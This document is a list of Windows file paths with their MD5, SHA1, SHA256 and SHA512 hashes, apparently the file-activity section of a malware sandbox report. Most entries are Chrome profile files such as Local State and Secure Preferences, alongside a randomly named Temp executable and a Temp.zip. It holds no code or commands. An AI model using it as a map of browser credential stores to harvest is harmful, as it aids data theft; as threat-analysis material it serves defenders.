MD5 6dd59703f4ade5be8d961b98e3d5f621
SHA1 3d715f25cd9aa2f6c9a358b2971ffecb9d3667a9
SHA256 f963aa0f6e3f39ce4bd0d4406da391248415d27a31a288bdb43a8de5783fd674
SHA512 f2def8ad71e0a523d10837712c2e32401a03babb07ae70d2d82101be0eedd89568b53ac42fd7dbb35f55c301218fd7855aac74eb7069bbce5361ab5bbd37b3b6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0b653aee7444c080652c957a9bbc9a83
SHA1 e0f9998ad37beeac829ef70f31899b312889648e
SHA256 d54efdc5d1eb79895cdd18f7e4a27fd2de3ed06a2e187518bc8cd946f9609646
SHA512 d58613ab8abc18f3414efebab24a62ff3f9ee3e0aeff2445d6e2d954271a4e790d88c15015c15ed0245dfd1dc071f705b736006b57f7465584007ecd5bd0eeff

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ea2cb1fa9f5e10ab81ec51afd79773c6
SHA1 361f593b429ea51554652cdfb85f969c0f29d9f0
SHA256 89a9612678b99af921f749e16c7fc3e395415d63f129d63b2f9c9fb3e022ad57
SHA512 2fe505ea192a3e0f7548a0c041a3fe61521b68fbc9d55e380a37525c210895f52997f45ff36c30de5ad04f9e7884ce20f31ac5901e3488e0760466ac3be7e5f3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd393e01c330b9c7f5cbe1e1d0aa4b9d
SHA1 3b8879b661e900411ea878e019b086a0ade5c98f
SHA256 573efb9ec9c97a5a4344ab46142bc60c4dd34d680f2df535242df8f2ced0c66a
SHA512 7198bbe7aa9b08397288a342cc98c215d1b0d67d9892e469b66ffb5b76b857c86d6c52dae1ccd87552ac6e260751de9fc665a057473bb75330cacf24393798e7

C:\Users\Admin\AppData\Local\Temp\jJm4qX1Ro9.exe

MD5 4a6cbc09917c9cd3f0ffa5d702cb82f7
SHA1 bf4dbc4e763c9de0d99264537f307b602d66fedf
SHA256 e919167dfba17e22e02304ada47074e340ea51bd2ae08378f0cdf99468c0bfa1
SHA512 67a8e9eb8312732a57ccbbfc7db17af7ff7703ac7bcdcb72fa71f3ad26cc78edea8f7af475332398e2c44f837480888fde04f8f2004910fd9751e75485fd9266

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 9e40975aa9b9f2d3b43c453ccc466987
SHA1 318ec9a05a7061d378939921578ddd38542b2f49
SHA256 269f1f50abad8cb36a2a27aaa540eb222df8fdc5b768bf6e0be86384fe5f44e0
SHA512 21bf745f4ce4cb4df6bdab4374c03b84f866beabf389074482bab089a910af4facb0fe7cd992941377177abccc8c82b6c3418554ca74676b7f6b7b64e995ed49

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 25505a6dec8d57f0ba5227478a656c5f
SHA1 c5ccc81be48acf24034c679faa2a36271a3e4385
SHA256 83a662dffa1da3ff91a9ac5ed9d7b55ad9704a61579e9aff136566baa34bf19d
SHA512 1026bbce0cfeb25758e6c2e59ac754bada5416974af384527028d49d728d7bb2bc6dc32057a62aa1f69e48bbc4a869c5d8bc0a913359d462daa31de778310c21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000014

MD5 740a924b01c31c08ad37fe04d22af7c5
SHA1 34feb0face110afc3a7673e36d27eee2d4edbbff
SHA256 f0e1953b71cc4abbffdd5096d99dfb274688e517c381b15c3446c28a4ac416e0
SHA512 da7061f944c69245c2f66b0e6a8b5a9bca91bda8a73f99734dcb23db56c5047de796fa7e348ff8840d9ac123436e38a4206408573215b7e5e98942ea6d66bb7c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 682dbfc2bf54061b6af30e9b91d98d27
SHA1 30f68dd5767a653345b09b6d214cb89557f0f1c9
SHA256 e92f91f289ca47e2d5e10dec4a49902645e28295dc595bfa3a6844ba84582e97
SHA512 afaf2827e39b1a2a4a15a80066b102578dd6e78b7b2656000fb944308a4630aab05f43ebaf8e19f0965f94cd7c1f364944c23fdd7b17bb5bc45206e955574ddd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 1b90e30902daad46ac7f683cec45421f
SHA1 fb0c3bac3e74094436cbb7ec46f2b0b34b158230
SHA256 f8da594af32fb78d74949c782b23df550d8b5061633f38272d61f01891612e09
SHA512 78c9b1fe74783f570cc95cc54e5c9fc4f9a523a484fc97795c6466d6165f2c933eaebc126ecf0e9835f61f1521b6ccf4c5de4d4906e85182827e6c382d82ed82

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000011

MD5 87e8230a9ca3f0c5ccfa56f70276e2f2
SHA1 eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7
SHA256 e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9
SHA512 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 feedd1479a3a243411d8561bb6d9dfe9
SHA1 dc8aafd2726f1d3f94017c540129bdd6bb6b9e57
SHA256 8a3067f548013933fd2b73c3e4f5f05de4d5dec94e131bdf06d7faff36c18271
SHA512 af05c9bdd91ea5260d2f41dd0015eb17af56710a8689698fb0b9dc602b050fb47a644d86ecbd4f0567506d6ada2c847afb411958b527d73c11dd5bc5c40dacba

C:\Users\Admin\Downloads\Temp.zip

MD5 61e540e0253752e2551d15d51a1dccf0
SHA1 c16c0d6abc4a7ea78025de50419215cc1d02f16c
SHA256 1c38f6c41fb1e927835092cb67cc8e938deb145e7f6d502b00dd07e4d5ba968e
SHA512 6fce2474edc409deb990a23e172b3f44c72f1d199116c9f353a4f1da31b8185bf131bb5fc3d6ea067cd95f38b51a2a72be1b2970d3d97b620d2723d8ec21dd60

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 dbe55a5ead94fb07f9af24ba4464762a
SHA1 c03564a3a003b619db1ed4b73eb5144a58fd2fa1
SHA256 c6f7f7035cf440986d59849c53504fca5c16952bbe725b154127ae8de75e940e
SHA512 41cf0c4ec0781c365f803c00eaf00f5866930d60f6506b4574a92870d88254058db80cdbd9f1e5e2662787dac7ba6cf2c2ee54d65bc0eee8dafae0c6532e9d97

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 ed368fb961c397627c94f3b8f4f1e062
SHA1 7a209cc831b047e06ecb0808293b4bc272f9368a
SHA256 ed847626ee4b6da275ac5d9009147e22d908f3d4726ffdc55b649ebf6e014e31
SHA512 a612af355511c40bc86c65d4903985770a1cb8c35f5478df187294e963e8e6cd21fcf9ad98163fd1afecbbad0d75e185ac27f5cdc6e5aa155c97eb433b3c6eeb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f5d4986fdca7e638468cc98c9bc12b50
SHA1 70193e45c425973b2d37b85ea6bcdcb596766b86
SHA256 bf5252b81c1c06227a2da6a0ebe54b266a754db999e46dd376fb257127a2cc20
SHA512 1a56d84095d2fe5e10fb54eaee14ede86cd0b147e72f090587777b075a19058bcfbab17629b32c9390368670dc2fc6524139bf95a62489248274625acb665772

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 553ce90ab06e610f064ccfd304e7f8b1
SHA1 34413ed456223713c7764fbe0cd73cec7a0dbd7a
SHA256 3014273714d06644675d5e5ddb2307f3e3975939efd78998066bdf2df180838b
SHA512 8d5295c78f33653f9c29208435cc57ac52d569f3637fd78fa60cb2fd79bb2c20dba41c9774a4a9648eeb386423ad125ab48e1263941765ddc6c185404323621a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5c434a.TMP

MD5 911b5e73c94e5a41bf483c2b54ca9ad8
SHA1 e0f8fe162625b0eb95881b4d2b067a4927f332ce
SHA256 624c481b891905e266d359376021eb78022266cd9bd8f0dd629919b39379eaf9
SHA512 2d1f8cfbf108c8f62769a533748cc6ae1e9735c9b12c147bf60ee10e98c5b8cc2d352e9d8087e964ec8a811e3d107ef220402dca4370d7081738a2ad10b9ee68

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8673229ec59c87fdfe976d70669cd691
SHA1 8ee554d16e57b41e66b946c511c5f5dbbaad7caf
SHA256 7a2a0166066137de1171ffbc500da64163c22ad1ec74b7e02c9329a8f97df118
SHA512 ee289c7cc0fbebb857f2314cc204149e96ccbada68c6abf13c05ce72429cfba87f7027c2ef3da4231e041eaa909862884bf387d629acfedcb0c8e5cd4d480e77

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 0f0596d7c43ff4e3938c8d79477e4b83
SHA1 78776659582543e013d1673301a5ddee6788529c
SHA256 fb096c3a549c63bbf6890fb9b27b8648fc5ae3b3672dd650937d31bc9a2df857
SHA512 3c11737d3487982add4fd041ab0e4fde63f2ab4f4be13b135aebb0ed352033cbb765c672f7e320a93c662270514f86d07d6e622650773ca3cfceafb0f4f562f1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 be2435a9d20066ed6779ae3713ac2f9b
SHA1 95e2d9c6d6c2f0c564cdc4a5e97060834831a9b1
SHA256 1ba9ed3db2bc455881c264f869e57d29ea2e66bc3712b449f23743ebece63a30
SHA512 83a7759a6cac00ac69047158c197ceaa516ac3408f60ede3dd7085c4c1a044c7ea9098d1d7561f70c26c96b439da03a839a2ff8234ad9c18b7c478a748e9fb07

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 c4b38b30d1097a15121c1bcb9edcc4f1
SHA1 c2c5636f3879fca1745cdfe96d00d3033a2d10b9
SHA256 a0285cc0fbd0e50677bcb8e51992be6a144e1d2fc190b4319dc91916c55b895b
SHA512 6632c5ba6dfc6f02b2c6e7a7131c9fe035f22cd30c31172fef8b80367934d61ea22b09a5c9d985ca6786dc1fe2648445da11020ffc8c9e40817b045f8ed0ed47

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 1131e12ddcc4bbe1ac485b622d442b91
SHA1 cf06af200f5e3d161ac1d76e9709a15c43a0a1b1
SHA256 56ae11ea263cc93d1015a67e857ccafce60db8036ff3acee169490cd7dd01444
SHA512 e52a6992bf016ca7e266fbbecdd092bb5feaf02a135866a7e740adf7a8e23ffa902a6b4d692c124683239a6d631cc2a46bb208f29e1ffbe7e36c369046ead0d1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 4eb54ee612e0e88bbeaebfacc3cf726c
SHA1 8119948debb42444aced5e43b2c66ba2ac15199e
SHA256 8a815122e69710e7d33660f38c7ff03da06f05e834aa9988d9a68572578d87a0
SHA512 c5a9b861a146c821b62a141c16ee324b0a551b91ab880ba66ffc02a602d954180ce2d4727e99bdcdcbdb4872f388844f4cefc43b45f33d70988ac81ac541b239

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 95da39d8b0c6f07d70d3206e78a4ea59
SHA1 7a94d8c31e6410ed543bf990b612de824421693e
SHA256 4377e8aef1b035ce76ddd243e46a02c270aa133996103aa0f134229dc8af104a
SHA512 fd6e8826194a38852b53c8092bd2fc15ebaa6d988dcd66b99086327c7e3b4ba2fc838c73fe0947e2ab61e75f19d96b3584fb8c4b93819f6955d24df06149078b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 1ae36961b8f262b7f2d12cd90ad78bd8
SHA1 67a8079e70432cc3ae0d2c77d30b8b48f51fbfb9
SHA256 4642b1c9799459265847358683bede9d34ccefac1533617644201225860291f5
SHA512 236d27a089d5d08a6d671fd0ac10d5343c5b5a46af5b55bda57058476acf95763ef02e23501d2d022f198949b9d5c3f9875102a0d52f3d4e66ed2d223ebd8760

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 479b46f6b9b8fcb10320b156e54e4252
SHA1 e045d82f272abf3f9b0b5404de9fbb1081ae9816
SHA256 41b87d2302a5ad91058614e601c0287169cff36fccbba6a6ad5f15469ea90044
SHA512 283528c5bc5bbd1affb48672a1852ba2b6db457541615972089d0da9fe44b8173cec0789f25e59ba54ceaa810c7e5b676a7936bcb05e2d9d2be84d9c18d1156e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 64751faccc9c30a89bec40281b78dd20
SHA1 1f4b5e7e6c3d77896e774c646c3a4459ca3d2079
SHA256 cf0a0eda8e2eb888cebbd0a6e7973cad38512c4db1a40ec0e5951ca70a2c3f89
SHA512 cf51934c50b1e2353715ca2ad6f28eb22f4100327d4ccc204a3f000508d1600ba0d05db8c73dc5842ea87bc64b9114ff37e7d080beb1ab10c5d5b623f800e394

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 677e91124ee4073e6ec8fe10f0fb7f41
SHA1 0fa2c5566711253808c65e9e01c323b7a3184513
SHA256 8aa18d8750026477dcbc4dc76128d725301e19dcf98fe5dcd7b36dc26f6456a7
SHA512 392d7bf4868df99c32eb781928585b0e7bdd3e8a3d8c2ee66442a1f91a6b981ed0c20a68994e4842ecb6848fc161b8395bbaa6691941bcf66e109c38c233471e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 4cdb46712c3d2a346fa106e885fe2a3d
SHA1 162ccfe5639752f9eca0be0b19d79bec04152b61
SHA256 1f448eef383363c2809521b2b358e955c095607d723c5f243e62b5fa663565e3
SHA512 6b0570127d1f05c43c135eea8c109b7cc4b51e7fe4a1375da3c21660430f9ebc2f96934ccfbce12d4ea604c951c782f0dea966961faea5fa2629d601555f2f89

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 d63bdf582d0b96f9be1a9bfd7158deeb
SHA1 4ca4f68845ceb41fb337d5913f474da2a5f5d1a9
SHA256 147420e2ca2a68aef9b93288c0d4df735618e2de5b2f850ac8ac1fd49138bb5f
SHA512 1ebdefde22e74bb15927aec0fbe1e79af56385655c75c7a370f11873f1673a9362b139d2deeda46a4c01fdd71f0c99fb3ba893150790d545487234e272046ff2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 a05aed638a9019ef96f3a00fbda7761e
SHA1 78499c2c61e6c393676276ec947036b19fbe31f1
SHA256 b2351a2deec51ae365d8002e2689df8b61dda32d5cdad5ac45088566277a2d23
SHA512 fffe91c32cf60ecc1de7b581b49656801aa963ea9ff30083c28e462e9e4f8d1a35cb34fb586ae09228f66275567a6a59862f7e5dd3530a5e44eb7648f5c9bd79